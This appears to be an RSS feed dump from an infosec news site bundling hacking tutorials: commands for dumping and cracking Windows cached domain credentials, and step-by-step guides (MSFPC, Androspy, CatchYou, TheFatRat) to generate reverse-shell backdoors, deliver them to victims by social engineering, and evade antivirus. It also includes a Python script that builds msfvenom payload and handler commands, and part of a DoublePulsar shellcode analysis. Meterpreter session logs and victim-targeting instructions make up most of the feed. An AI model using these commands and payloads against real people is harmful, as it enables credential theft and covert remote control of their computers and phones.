Information Security News|Cyber Security|Hacking Tutorial, https://www.securitynewspaper.com/ (Information Security Newspaper|Infosec Articles|Hacking News), feed generated Wed, 24 Nov 2021 00:04:02 +0000

Top 6 tools used by hackers for stealing Windows domain cache credentials. 5 alternatives of Mimikatz
https://www.securitynewspaper.com/2021/11/24/top-6-tools-used-by-hackers-for-stealing-windows-domain-cache-credentials-5-alternatives-of-mimikatz/
Wed, 24 Nov 2021 18:10:00 +0000

The post Top 6 tools used by hackers for stealing Windows domain cache credentials. 5 alternatives of Mimikatz appeared first on Information Security Newspaper | Hacking News.

Although some users are unaware of it, it is a known fact that Windows systems store information about domain user logons locally, so that those users can still log on when no domain controller is reachable. According to network security specialists, this feature is known as Domain Cached Credentials (DCC), also referred to as MSCACHE or MSCASH.

The cached entries are hashes produced by the MSCACHE algorithm and are stored locally in the registry, under the SECURITY hive (HKLM\SECURITY\Cache); by default the last 10 logons are kept (the CachedLogonsCount policy setting). There are two versions of MSCASH/MSCACHE (DCC):

  • MSCACHEv1 (DCC1), used on Windows XP, Windows Server 2003 and earlier
  • MSCACHEv2 (DCC2), used from Windows Vista and Windows Server 2008 onward

This time, network security specialists from the International Institute of Cyber Security (IICS) show several ways to extract these cached account hashes from a compromised domain-joined host, and how to crack them afterwards.

Metasploit

Metasploit ships a post module that lets pentesters retrieve the MSCACHE hashes stored on a Windows system through an existing session (it needs SYSTEM privileges, since the SECURITY hive is not readable by an ordinary administrator token). The module retrieves the domain hashes that were cached because of the Group Policy setting mentioned above; by default Windows keeps the last 10 successful logons:

use post/windows/gather/cachedump
set SESSION 2
run

When the module runs it dumps the DCC2/MSCACHE password hashes (the original post shows the output as a screenshot).

Impacket

This information can also be retrieved offline with Python and the impacket library. Before using this technique you need to save the SYSTEM and SECURITY registry hives locally (from an elevated command prompt on the target) with the following commands:

reg save hklm\system c:\system
reg save hklm\security c:\security

Next, copy the resulting files to the machine where impacket is installed; in this example that is a Kali Linux system. Then, to extract the DCC2/MSCACHE hashes, point secretsdump at both hive files and use the LOCAL target:

python3 secretsdump.py -security security -system system LOCAL

The original post shows the result of running this script as a screenshot.

Mimikatz

Network security researchers mention that Mimikatz is one of the best pentesting and account extraction utilities for Windows. To extract the DCC2/MSCACHEv2 hashes you need to run Mimikatz on the compromised system from an elevated (administrator) prompt and issue the following commands; the first two obtain the SeDebugPrivilege and a SYSTEM token, which are required to read the cache:

privilege::debug
token::elevate
lsadump::cache

The original post shows the result of running the above commands as a screenshot.

PowerShell Empire

Experts mention that PowerShell Empire has a module for extracting MSCACHEv2 hashes from the registry of a compromised machine. Once a stager has been executed on the target and the resulting agent has checked in to your Empire server, load the module, point it at that agent and execute it:

usemodule credentials/mimikatz/cache
set Agent <agent_id>
execute

The original post shows the MSCACHEv2 hashes dumped by the module as a screenshot.

Koadic

As with PowerShell Empire, you can use the Koadic utility to extract the DCC2 hashes. Its mimikatz implant accepts the Mimikatz command to run through the MIMICMD option:

use implant/inject/mimikatz_dotnet2js
set MIMICMD lsadump::cache
run

The original post shows the results as a screenshot.

Python scripts

As in the impacket example, you can use the mscache.py script to retrieve the hashes from MSCACHEv2. Download the script from GitHub and, when starting it, pass the paths of the saved SECURITY and SYSTEM hive files as parameters:

python mscache.py --security /root/Desktop/security --system /root/Desktop/system

The original post shows the result of running this script as a screenshot.

Decryption of received hashes

As mentioned by network security experts, these hashes cannot be used in pass-the-hash attacks (they are not NT hashes), so an offline cracking tool such as John the Ripper is required:

john --format=mscash2 --wordlist=/usr/share/wordlists/rockyou.txt mhash

If the password is in the wordlist, we get the clear-text password for the specified hash. Note that DCC2 is slow to crack: MSCACHEv2 runs PBKDF2-HMAC-SHA1 with 10240 iterations per guess by default, whereas DCC1 is a single MD4, so expect far fewer guesses per second than with NTLM (hashcat mode 2100 handles the same format). Try not to get confused between the names: DCC2 and MSCACHEv2/MSCASH2 are the same format, and all the techniques above extract it.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

Now Generate Android, Windows, Linux Payload in a Minute
https://www.securitynewspaper.com/2020/07/02/now-generate-android-windows-linux-payload-in-a-minute/
Fri, 03 Jul 2020 04:13:02 +0000

Introduction

MSFvenom Payload Creator (MSFPC) is a wrapper around msfvenom (part of the Metasploit Framework). It can generate Windows, Android and Linux payloads in a minute and is an easy way to produce Meterpreter payloads without remembering the msfvenom syntax; alongside each payload it writes a resource (.rc) file that starts the matching handler. MSFPC can automatically identify the network interface and IP address to use. Earlier, researchers of the International Institute of Cyber Security demonstrated many other payloads that are FUD (Fully Undetectable). MSFPC is pre-installed in Kali Linux.

Environment

  • OS: Kali Linux 2020 64bit
  • Kernel version: 5.6.0

Execution Steps

  • Use this command to show the help: msfpc -h
MSFPC – Help Fig 1
MSFPC – Help Fig 2

Generate Windows Payload

  • Generate the payload with msfpc <TYPE> (<DOMAIN/IP>) (<PORT>)
  • Command to run: msfpc windows 192.168.0.51 4444
MSFPC – Windows Payload
  • Now open another terminal and run msfconsole -q -r '/home/iicybersecurity/windows-meterpreter-staged-reverse-tcp-4444-exe.rc' to start the handler from the generated resource file.
MSFPC – Windows Handler
  • For testing, send the generated malicious exe file to the victim.
MSFPC – Windows Malicious EXE file
  • If the victim executes the exe file, we get access to the victim's machine.
MSFPC – Exploited Windows machine
  • We successfully got a session and are able to access the victim's machine.

Generate Android Payload

  • Now let's exploit an Android phone using MSFPC.
  • Create the apk file with msfpc apk 192.168.0.51 5555
MSFPC – Android APK
  • The payload was created successfully.
  • Next, start the handler with msfconsole -q -r '/home/iicybersecurity/android-meterpreter-stageless-reverse-tcp-5555-apk.rc'
MSFPC – APK Handler
  • Now send the apk file to the victim. If the victim installs the apk file on their mobile:
MSFPC – APK File
  • a session is opened on the attacker's machine.
MSFPC – Exploited Victim's Phone
  • We are successfully able to access the victim's mobile.

Generate Linux Payload

  • Now let's exploit a Linux machine using MSFPC.
  • Use this command to create the Linux payload: msfpc bash 192.168.0.51 2222
MSFPC – Linux Payload
  • The payload was created successfully.
  • Next, start the handler with msfconsole -q -r '/home/iicybersecurity/bash-shell-staged-reverse-tcp-2222-sh.rc'
MSFPC – Linux Handler
  • Now send the malicious file to the victim.
  • If the victim executes these commands on their machine:
    • chmod +x bash-shell-staged-reverse-tcp-2222.sh
    • ./bash-shell-staged-reverse-tcp-2222.sh
  • a session is started automatically on the attacker's machine.
MSFPC – Exploited Linux Machine
  • The Linux machine was successfully exploited.
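To see what the msfpc one-liners above are shorthand for, here is an added example (not MSFPC's own code; the real logic lives in the MSFPC project) that expands a type, LHOST and LPORT into the msfvenom command and the multi/handler resource file, in the style of the file names the tutorial shows. The payload-to-type mapping, the staged/stageless names and the output formats are this example's own assumptions; confirm them against msfvenom -l payloads on your system. Nothing is executed: the functions return strings so they can be reviewed first.

```python
"""What an MSFPC one-liner expands to: the msfvenom command plus the msfconsole
resource (.rc) file that starts the matching multi/handler.

Added example, not MSFPC's own code.  The PAYLOADS table below is an
assumption chosen to match the file names in the tutorial
(e.g. windows-meterpreter-staged-reverse-tcp-4444-exe.rc); nothing here runs
msfvenom or msfconsole, the functions only build the text.
"""
import ipaddress
import shlex

# type -> (staged payload, stageless payload, msfvenom format, file extension)
# cmd/unix/reverse_bash has no staged variant, so both names are the same.
PAYLOADS = {
    "windows": ("windows/meterpreter/reverse_tcp", "windows/meterpreter_reverse_tcp", "exe", "exe"),
    "apk":     ("android/meterpreter/reverse_tcp", "android/meterpreter_reverse_tcp", "raw", "apk"),
    "bash":    ("cmd/unix/reverse_bash", "cmd/unix/reverse_bash", "raw", "sh"),
}


def validate(lhost: str, lport: int) -> None:
    """Reject bad input up front instead of letting msfvenom fail half-way through."""
    ipaddress.ip_address(lhost)            # raises ValueError for anything that is not an IP
    if not 1 <= lport <= 65535:
        raise ValueError(f"bad port {lport}")


def build(kind: str, lhost: str, lport: int, staged: bool = True) -> dict:
    """Return the payload name, output file, msfvenom command line and handler .rc text."""
    validate(lhost, lport)
    staged_name, stageless_name, fmt, ext = PAYLOADS[kind]
    payload = staged_name if staged else stageless_name
    stem = f"{kind}-{'staged' if staged else 'stageless'}-reverse-tcp-{lport}"
    outfile = f"{stem}.{ext}"
    venom = ["msfvenom", "-p", payload, f"LHOST={lhost}", f"LPORT={lport}",
             "-f", fmt, "-o", outfile]
    rc = "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {payload}",          # handler payload must match the generated one
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "set ExitOnSession false",         # keep listening after the first session
        "exploit -j -z",                   # run as a background job, do not auto-interact
        "",
    ])
    return {"payload": payload, "file": outfile, "rc_file": f"{stem}-{ext}.rc",
            "msfvenom": shlex.join(venom), "rc": rc}


if __name__ == "__main__":
    for kind, port, staged in (("windows", 4444, True), ("apk", 5555, False), ("bash", 2222, True)):
        r = build(kind, "192.168.0.51", port, staged)   # address taken from the tutorial
        print(r["msfvenom"])
        print(f"--- {r['rc_file']} ---\n{r['rc']}")
```

The two lines that matter most when you write such a handler by hand are the PAYLOAD, which must match what msfvenom produced (a staged exe talking to a stageless handler simply never gets its stage), and ExitOnSession false with exploit -j, without which the handler exits after the first callback.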

Conclusion

We saw how to create payloads and exploit Windows, Linux and Android machines using MSFPC. MSFPC makes this easy for attackers, since they do not need to remember the msfvenom commands.

How to Hack Any Android Mobile using Androspy – Step by Step
https://www.securitynewspaper.com/2020/07/01/how-to-hack-any-android-mobile-using-androspy-step-by-step/
Thu, 02 Jul 2020 04:20:48 +0000

Introduction

Hacking an Android device is fun, but how do attackers do it? There are many ways to get into a mobile device, "some of which require a high level of technical knowledge and some only basic technical knowledge", as commented by a researcher of the International Institute of Cyber Security. The ones that require high technical knowledge are RCE and zero-day exploits; the ones that require only basic technical knowledge are presented here step by step.

Today we will talk about Androspy, a useful tool for compromising Android phones by simply generating a malicious APK that contains a backdoor. APK is the package file format of Android. The tool can also encrypt the payload. Androspy is easy to use, and there is no need to remember commands to attack the victim. At the end we also explain how to protect your Android device from these attacks.

Environment

  • OS: Parrot 64bit
  • Kernel version: 5.2.0

Installation steps

┌─[root@parrot]─[/home/iicybersecurity]
└──╼ #git clone https://github.com/Cyb0r9/Androspy
Cloning into 'Androspy'...
remote: Enumerating objects: 66, done.
remote: Total 66 (delta 0), reused 0 (delta 0), pack-reused 66
Unpacking objects: 100% (66/66), done.
  • Use the cd command to enter the Androspy directory
┌─[root@parrot]─[/home/iicybersecurity]
└──╼ #cd Androspy/
┌─[root@parrot]─[/home/iicybersecurity/Androspy]
└──╼ #
  • Make the setup script executable with chmod +x setup.sh
  • Now install the dependencies with ./setup.sh
┌─[root@parrot]─[/home/iicybersecurity/Androspy]
└──╼ #./setup.sh
 update [✔]
Get:1 https://deb.parrot.sh/parrot rolling InRelease
Hit:2 https://deb.parrot.sh/parrot rolling-security InRelease
Get:3 https://deb.parrot.sh/parrot rolling/main amd64 Packages [17.1 MB]
Get:4 https://deb.parrot.sh/parrot rolling/main i386 Packages [17.0 MB]
Get:5 https://deb.parrot.sh/parrot rolling/contrib amd64 Packages [139 kB]
============================================================================================================SNIP============================================================================================================================
Reading state information... Done
1930 packages can be upgraded. Run 'apt list --upgradable' to see them.
 keytool [✔]
 jarsigner [✔]
 Apache2 [✔]
 Metasploit-Framework [✔]
 xterm [✔]
  • Next, make the tool executable with chmod +x androspy.sh
  • Now launch the tool (./androspy.sh).
Androspy – Tool Launch
  • The tool launched successfully.
Androspy – Listener Host and Port
  • Now enter the LHOST (IP address) and port number. LHOST is the local host IP, i.e. the IP address of your Parrot OS machine.
  • Then enter the payload name.
Androspy – Payload Encryption
  • After that we get an option to encrypt the payload. Choose the required option.
  • It then asks for a password and a few details such as name, organization and location; when finished, type yes and press enter.
  • Once we press enter we get a popup reading "Hello World"; close it.
  • After that we get "Your Payload Has Been Successfully Encrypted".
Androspy – Metasploit
  • It then displays two URLs (the target URL and a TinyURL); enter Y to start the listener.
  • Next, a new tab named IP poisoner opens.
  • Now send the APK file, which is located in the Androspy directory, to the victim using social engineering. You can also send the TinyURL to the victim.
  • If the victim installs the APK file on their mobile, they see the screen below.
Androspy – APK File
  • After the APK is installed, the attacker sitting on Parrot OS gets a session, i.e. complete control of the victim's mobile.
Androspy – Session
  • We successfully got access to the victim's phone.
  • It shows that the victim's mobile runs Android 7.1.2.

Conclusion

We saw how easy it is to compromise an Android phone with the Androspy tool by simply generating a malicious APK and sending it to the victim for installation. So it is always recommended not to install any APK file you receive on WhatsApp or any other social medium. If you want to install software, always do it from the Google Play Store.

Bypass Antivirus with Fully Undetectable(FUD) payload – Step By Step
https://www.securitynewspaper.com/2020/04/27/bypass-antivirus-with-fully-undetectablefud-payload-step-by-step/
Mon, 27 Apr 2020 15:23:32 +0000

Introduction

When an attacker sends a malicious file to a victim, most tools do not get past the antivirus (AV) protection. Today we will talk about a tool that claims to bypass antivirus protection and compromise the victim's machine. Ethical hacking researchers are always finding easy ways to bypass antivirus protection, and there are many other ways to do it.

The tool is called CatchYou. It is a social engineering tool that can be used to compromise a Windows machine by sending a single link to the victim. It uses the Metasploit Framework to handle the session from the victim's machine and an Ngrok tunnel as a reverse proxy so that a listener on a private network can be reached from outside. CatchYou is easy to install, and we demonstrate how it works step by step.

Environment

  • OS: Kali Linux 2019.3 64 bit
  • Kernel-version: 5.2.0

Installation Steps

 root@kali:/home/iicybersecurity# git clone https://github.com/thelinuxchoice/catchyou
Cloning into 'catchyou'...
remote: Enumerating objects: 26, done.
remote: Counting objects: 100% (26/26), done.
remote: Compressing objects: 100% (25/25), done.
remote: Total 26 (delta 10), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (26/26), 21.74 KiB | 53.00 KiB/s, done.
  • Use the cd command to enter the catchyou directory.
root@kali:/home/iicybersecurity# cd catchyou/
root@kali:/home/iicybersecurity/catchyou#
  • Now launch the tool.
CatchYou
  • Here, choose the payload option to use against the victim's machine.
Windows Payload
  • It generates two files, catchyou.exe and index.php.
Metasploit on hacker machine
  • We selected windows/shell/reverse_tcp and entered the LHOST and LPORT.
  • The payload is saved as catchyou.exe in the catchyou directory, and selecting Y starts the Metasploit listener.
  • Now send this exe file to the victim by USB drive, or by sending a URL using social engineering.
  • To deliver the URL we can also use the pwndrop tool, which lets you host your own file-drop server and send any file, including a malicious one, to another person over an encrypted link. The pwndrop setup is covered in a separate guide.
  • Here we used pwndrop to send the URL to the victim. Once the victim clicks the URL, the FUD payload is downloaded, as shown below.
Malicious link downloading Catchyou.exe on Victim
  • If the victim opens this exe file on their machine, we get a shell on it.
Victim's Shell

Conclusion

We saw how easy it is to compromise a victim's computer by sending a URL or a malicious file. DO NOT UPLOAD THE GENERATED PAYLOAD TO VIRUSTOTAL: samples submitted there are shared with antivirus vendors, so the payload would be detected shortly afterwards.

New version of Kali Linux 2019.1 with Metasploit 5.0 available
https://www.securitynewspaper.com/2019/02/19/new-version-of-kali-linux-2019-1-with-metasploit-5-0-available/
Tue, 19 Feb 2019 19:37:38 +0000


The latest version of the operating system has multiple upgrades and updates

Network security and ethical hacking specialists from the International Institute of Cyber Security report on the release of Kali Linux 2019.1, the operating system most requested by pentesters and information security enthusiasts.

This Debian-based operating system ships with Metasploit 5.0, which many network security specialists consider one of the most trusted penetration testing frameworks available.

The framework has been improved in several respects: a new JSON-RPC daemon, a new search engine, new evasion modules, support for writing shellcode in C, and an integrated web service.

Since its launch in 2013, Kali Linux has earned its place in the cybersecurity community by providing a large set of pre-installed tools within a single operating system. This latest version includes bug fixes and updates for multiple tools, among them DBeaver and Binwalk.

According to network security specialists, the operating system also has an updated kernel with support for the Banana Pi and Banana Pro single-board computers.

In addition, the Raspberry Pi images have been simplified further to make it easier to choose the right one. The latest version of Kali Linux is available for general use and can be downloaded from the official website.

Hack Windows, Android, Mac using TheFatRat (Step by Step tutorial)
https://www.securitynewspaper.com/2019/01/31/hack-windows-android-mac-using-thefatrat-step-by-step-tutorial/
Thu, 31 Jan 2019 05:01:21 +0000

Using Metasploit is no longer difficult, because many resources explaining its use are available on the internet. Metasploit is the common way of attacking outdated operating systems, and there are still many systems that can be exploited remotely. There are also many antiviruses that do not detect these payloads, say ethical hacking professionals. Here we are talking about TheFatRat.

Ethical hacking researchers of the International Institute of Cyber Security did a detailed analysis of how TheFatRat works in order to look inside this pentesting tool.

TheFatRat is another Metasploit-like tool used to generate backdoors easily. It compiles malware with some popular payloads, which can then be used to attack operating systems such as Windows, macOS and Linux. The tool offers many options, such as creating backdoors and infected DLLs, according to the ethical hacking investigation.

The whole tool was tested on Parrot OS. After creating the backdoors, they were opened on Windows 10 (build 1607) and on Android.

  • To clone it, type git clone https://github.com/Screetsec/TheFatRat.git
  • Then type cd TheFatRat
  • Type chmod u+x setup.sh
  • Type ./setup.sh
  • If mono does not install, type sudo apt-get update followed by sudo apt-get install mono-mcs, or sudo apt-get install mono-devel, or sudo apt-get install mono-complete
  • Some of the mono-related dependencies do not install directly, so simply run the commands above.
  • During installation it asks whether to create a shortcut in Parrot OS. Simply type y; after installation you can run fatrat just like you run msfconsole.
  • Then type fatrat
  • As you can see, TheFatRat gives tons of options to create a session on a target Windows machine or on other platforms.

Creating A Simple Exploit To Hack Windows 10 :-

  • Type 6, which will create a FUD backdoor using pwnwinds.
  • Then choose the option that creates a FUD backdoor using C# + PowerShell.
  • Enter the LHOST (listener/attacker IP address). Type 192.168.1.12
  • Type port 4444 or any other port number.
  • Enter the backdoor file name tstfile
  • Type 3 to use windows/meterpreter/reverse_tcp.
  • Press enter to create the backdoor.
  • After the backdoor is created it is saved in /home/user/Downloads/TheFatRat/output/tstfile.exe
  • To access the backdoor go to the above location.
  • Open another terminal and start msfconsole; it will be used to handle the incoming session.
  • Type msfconsole
  • After msfconsole has started, type use exploit/multi/handler
  • Then type set payload windows/meterpreter/reverse_tcp
  • Type set LHOST 192.168.1.12
  • Type set LPORT 4444
  • Type exploit
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit
  • Now, to open the backdoor on Windows 10, simply copy it from the output location to a USB drive and open the drive on Windows 10. You can also use any social engineering technique (such as faking a website in seconds) to pass this exe to the TARGET computer.
  • You have to copy two files, tstfile.exe and program.cs, as this backdoor was created using C#.
  • Then double-click on tstfile.exe
  • When the target clicks the file a popup comes up, and then a meterpreter session is opened.
  • As shown below, the meterpreter session has started in msfconsole.
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.12:4444
[*] Sending stage (179779 bytes) to 192.168.1.5
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.5:61050) at 2019-01-30 12:24:04 +0000
meterpreter > sysinfo
Computer : DESKTOP-2304ULE
OS : Windows 10 (Build 16299).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
  • The target above is running Windows 10. Once the session is created, the attacker can perform various tasks.

Creating A Backdoor Easily With Another Option (with C code):-

  • Type 6
  • Type 6
  • Type 6
  • Enter the LHOST (listener/attacker IP address). Type 192.168.1.12
  • Type port 4444 or any other port number.
  • Enter the backdoor file name tstfile
  • Press enter to create the backdoor.
  • Open another terminal and start msfconsole; it will be used to handle the incoming session.
  • Type msfconsole
  • After msfconsole has started, type use exploit/multi/handler
  • Then type set payload windows/meterpreter/reverse_tcp
  • Type set LHOST 192.168.1.12
  • Type set LPORT 4444
  • Type exploit
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit
  • When the target opens the malicious file (tstfile.exe) on Windows 10, a meterpreter session starts.
[*] Started reverse TCP handler on 192.168.1.12:4444
[*] Sending stage (179779 bytes) to 192.168.1.5
[*] Meterpreter session 2 opened (192.168.1.12:4444 -> 192.168.1.5:61331) at 2019-01-30 15:19:28 +0000
meterpreter >
  • As you can see, a meterpreter session has started on the attacker's machine. Now the attacker can easily manipulate the target.

Creating A Backdoor Using Apache + PowerShell :-

  • Type 6
  • Type 3
  • Enter the LHOST (listener/attacker IP address). Type 192.168.1.12
  • Type port 4444 or any other port number.
  • Enter the backdoor file name tstfile1
  • Type 3
  • Press enter to create the backdoor.
  • Open the backdoor created above on Windows 10, or trick your target into opening it on their PC.
  • Open another terminal and start msfconsole; it will be used to handle the incoming session.
  • Type msfconsole
  • After msfconsole has started, type use exploit/multi/handler
  • Then type set payload windows/meterpreter/reverse_tcp
  • Type set LHOST 192.168.1.12
  • Type set LPORT 4444
  • Type exploit
  • When the target opens the backdoor (tstfile1.exe) on Windows, a new session is created.
[*] Sending stage (179779 bytes) to 192.168.1.5
[*] Meterpreter session 3 opened (192.168.1.12:4444 -> 192.168.1.5:61336) at 2019-01-30 15:20:01 +0000
meterpreter >

The difference between the backdoors is that the first uses C# + PowerShell, where you have to copy files to the target. The second only requires choosing the options to create the backdoor, although it also requires setting the payload. The third uses the Apache web server to create the backdoor. The third backdoor is the strongest one for attackers: its session does not expire easily, whereas the sessions of the first two dropped suddenly while testing, according to ethical hacking courses.

Inject Using PHP:-

  • Here we create a backdoor using PHP. Type 1
  • Then type 5
  • Type LHOST 192.168.1.7
  • Then type port 80
  • Enter the file name tstfile
  • As shown in the image in the original post, this backdoor uses a PHP meterpreter payload to create a session.
  • After the payload is created, move it to the Apache web root, since it will be opened through the server's IP address.
  • Type cp tstfile.php /var/www/html
  • Then type sudo service apache2 start
  • Then, in the browser on the target Windows machine, open 192.168.1.7/tstfile.php
  • When the target opens that URL the PHP script runs in the background and a session starts, as shown below.

[*] Meterpreter session 1 opened (192.168.1.12:80 -> 192.168.1.5:61331) at 2019-01-30 17:45:28 +0000
Id  Type                   Information                 Connection
--  ----                   -----------                 ----------
1   meterpreter php/linux  www-data (33) @ apache2     192.168.1.7:80 -> 192.168.1.5:61331

msf exploit(handler) > sessions -i 1
meterpreter > sysinfo
Computer : DESKTOP-2304ULE
OS : Windows 10 (Build 16299).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
  • By just opening a URL, the target can easily get hacked.

Attacking An Android Device :-

  • Type 1
  • Type 192.168.1.7
  • Type 4444
  • Then enter the file name backdoor
  • Type 3
  • Press enter to create the backdoor.
  • This creates an infected .apk file.
  • We will open the backdoor on an Android mobile. Here we used Android 4.4 (KitKat).
  • Create a multi handler inside msfconsole.
  • Type use exploit/multi/handler
  • Type set payload android/meterpreter/reverse_tcp
  • Type set LHOST 192.168.1.7
  • Type set LPORT 4444
  • Type exploit
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.7
LHOST => 192.168.1.7
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit
  • Install the backdoor.apk created above.
  • When backdoor.apk is opened on Android, a new session is created in msfconsole. According to a digital forensics expert from the International Institute of Cyber Security, users should be cautious when downloading any new Android app, as it can be an Android trojan.
[*] Started reverse TCP handler on 192.168.1.7:4444
[*] Sending stage (70554 bytes) to 192.168.1.12
[*] Meterpreter session 1 opened (192.168.1.7:4444 -> 192.168.1.12:58445) at 2019-01-31 02:04:20 +0000
meterpreter > help
Core Commands
Command                   Description
-------                   -----------
?                         Help menu
background                Backgrounds the current session
bg                        Alias for background
bgkill                    Kills a background meterpreter script
bglist                    Lists running background scripts
bgrun                     Executes a meterpreter script as a background thread
channel                   Displays information or control active channels
close                     Closes a channel
disable_unicode_encoding  Disables encoding of unicode strings
enable_unicode_encoding   Enables encoding of unicode strings
exit                      Terminate the meterpreter session
get_timeouts              Get the current session timeout values
guid                      Get the session GUID
help                      Help menu
info                      Displays information about a Post module
irb                       Open an interactive Ruby shell on the current session
load                      Load one or more meterpreter extensions
machine_id                Get the MSF ID of the machine attached to the session
pry                       Open the Pry debugger on the current session
quit                      Terminate the meterpreter session
read                      Reads data from a channel
resource                  Run the commands stored in a file
run                       Executes a meterpreter script or Post module
sessions                  Quickly switch to another session
set_timeouts              Set the current session timeout values
sleep                     Force Meterpreter to go quiet, then re-establish session.
transport                 Change the current transport mechanism
use                       Deprecated alias for "load"
uuid                      Get the UUID for the current session
write                     Writes data to a channel
  • Type sysinfo
meterpreter > sysinfo
Computer : localhost
OS : Android 4.4.2 - Linux 3.10.52-android-x86+ (i686)
Meterpreter : dalvik/android
meterpreter >
  • From here the attacker can take full advantage of the target Android device.

DoublePulsar Initial SMB Backdoor Ring 0 Shellcode Analysis
https://www.securitynewspaper.com/2017/04/22/doublepulsar-initial-smb-backdoor-ring-0-shellcode-analysis/
Sat, 22 Apr 2017 16:55:12 +0000

The post DoublePulsar Initial SMB Backdoor Ring 0 Shellcode Analysis appeared first on Information Security Newspaper | Hacking News.

One week ago today, the Shadow Brokers (an unknown hacking entity) leaked the Equation Group’s (NSA) FuzzBunch software, an exploitation framework similar to Metasploit. In the framework were several unauthenticated, remote exploits for Windows (such as the exploits codenamed EternalBlue, EternalRomance, and EternalSynergy). Many of the vulnerabilities that are exploited were fixed in MS17-010, perhaps the most critical Windows patch in almost a decade.

Side note: You can use my MS17-010 Metasploit auxiliary module to scan your networks for systems missing this patch (uncredentialed and non-intrusive). If a missing patch is found, it will also check for an existing DoublePulsar infection.

Introduction

For those unfamiliar, DoublePulsar is the primary payload used in SMB and RDP exploits in FuzzBunch. Analysis was performed using the EternalBlue SMBv1/SMBv2 exploit against Windows Server 2008 R2 x64.

The shellcode, in tl;dr fashion, essentially performs the following:

  • Step 0: Shellcode sorcery to determine if x86 or x64, and branches as such.
  • Step 1: Locates the IDT from the KPCR, and traverses backwards from the first interrupt handler to find ntoskrnl.exe base address (DOS MZ header).
  • Step 2: Reads ntoskrnl.exe’s exports directory, and uses hashes (similar to usermode shellcode) to find ExAllocPool/ExFreePool/ZwQuerySystemInformation functions.
  • Step 3: Invokes ZwQuerySystemInformation() with the SystemModuleInformation information class, which returns a list of all loaded drivers. It uses this to locate Srv.sys, the SMBv1 server driver.
  • Step 4: Switches the SrvTransactionNotImplemented() function pointer located at SrvTransaction2DispatchTable[14] to its own hook function.
  • Step 5: With secondary DoublePulsar payloads (such as inject DLL), the hook function sees if you “knock” correctly and allocates an executable buffer to run your raw shellcode. All other requests are forwarded directly to the original SrvTransactionNotImplemented() function. “Burning” DoublePulsar doesn’t remove this hook, just makes it dormant.

Honestly, you don’t usually wake up in the morning and feel like spending time dissecting ~3600 some odd bytes of Ring-0 shellcode, but I felt productive today. Also I was really curious about this payload and didn’t see very many details about it outside of Countercept’s analysis of the DLL injection code. But I was interested in how the initial SMB backdoor is installed, which is what this post is about.

Zach Harding, Dylan Davis, and I kind of rushed through it in a few hours in our red team lab at RiskSense. There is some interesting setup with the IA32_LSTAR MSR (0xC0000082) and a region of Srv.sys containing FEFE’s, but we don’t talk about such things… Much like the EXTRABACON shellcode, this one is crafty and does not simply spawn a shell.

Detailed Shellcode Analysis

Inside the Shadow Brokers dump you can find DoublePulsar.exe and EternalBlue.exe. When you use DoublePulsar in FuzzBunch, there is an option to spit its shellcode out to a file. We found out this is a red herring, and that the EternalBlue.exe contained its own payload.

Step 0: Determine CPU Architecture

The main payload is quite large because it contains shellcode for both x86 and x64. The first few bytes use opcode trickery to branch to the correct architecture (see my previous article on assembly architecture detection).

Here is how x86 sees the first few bytes.

You’ll notice that inc eax means the je (jump equal/zero) instruction is not taken. What follows is a call and a pop, which is to get the current instruction pointer.

And here is how x64 sees it:

The inc eax byte is instead the REX preamble for a NOP. So the zero flag is still set from the xor eax, eax operation. Since x64 has RIP-relative addressing it doesn’t need to get the RIP register.

The x86 payload is essentially the same thing as the x64 so this post only focuses on x64.

Since the NOP was a true NOP on x64, I overwrote the 40 90 with cc cc (int 3) using a hex editor. Interrupt 3 is how debuggers set software breakpoints.

Now when the system is exploited, our attached kernel debugger will automatically break when the shellcode starts executing.

Step 1: Find ntoskrnl.exe Base Address

Once the shellcode figures out it is x64 it begins to search for the base of ntoskrnl.exe. This is done with the following stub:

Fairly straightforward code. In user mode the GS segment on x64 points to the Thread Environment Block (TEB), which in turn holds a pointer to the Process Environment Block (PEB), a struct containing all kinds of information about the current process. In kernel mode the same segment instead points to the Kernel Processor Control Region (KPCR), a per-CPU struct whose first member is an NT_TIB rather than a process PEB.

This code grabs offset 0x38 of the KPCR, the IdtBase field, which points to an array of KIDTENTRY64 structures. Those familiar with the x86 family will recognise this as the Interrupt Descriptor Table.

From offset 4 into a KIDTENTRY64 entry the shellcode recovers the address of the interrupt handler, which is code inside ntoskrnl.exe (the handler address is split across the entry’s OffsetLow, OffsetMiddle and OffsetHigh fields; since the search that follows is page-granular, only the upper bits need to be exact). From there it searches backwards in memory in 0x1000 increments (the page size) for the .exe DOS MZ header (cmp bx, 0x5a4d).

Step 2: Locate Necessary Function Pointers

Once you know where the MZ header of a PE file is, you can peek into defined offsets for the export directory and get the relative virtual address (RVA) of any function you want. Userland shellcode does this all the time, usually to find necessary functions it needs out of ntdll.dll and kernel32.dll. Just like most userland shellcode, this ring 0 shellcode also uses a hashing algorithm instead of hard-coded strings in order to find the necessary functions.

The following functions are found:

  • ZwQuerySystemInformation
  • ExAllocatePool
  • ExFreePool

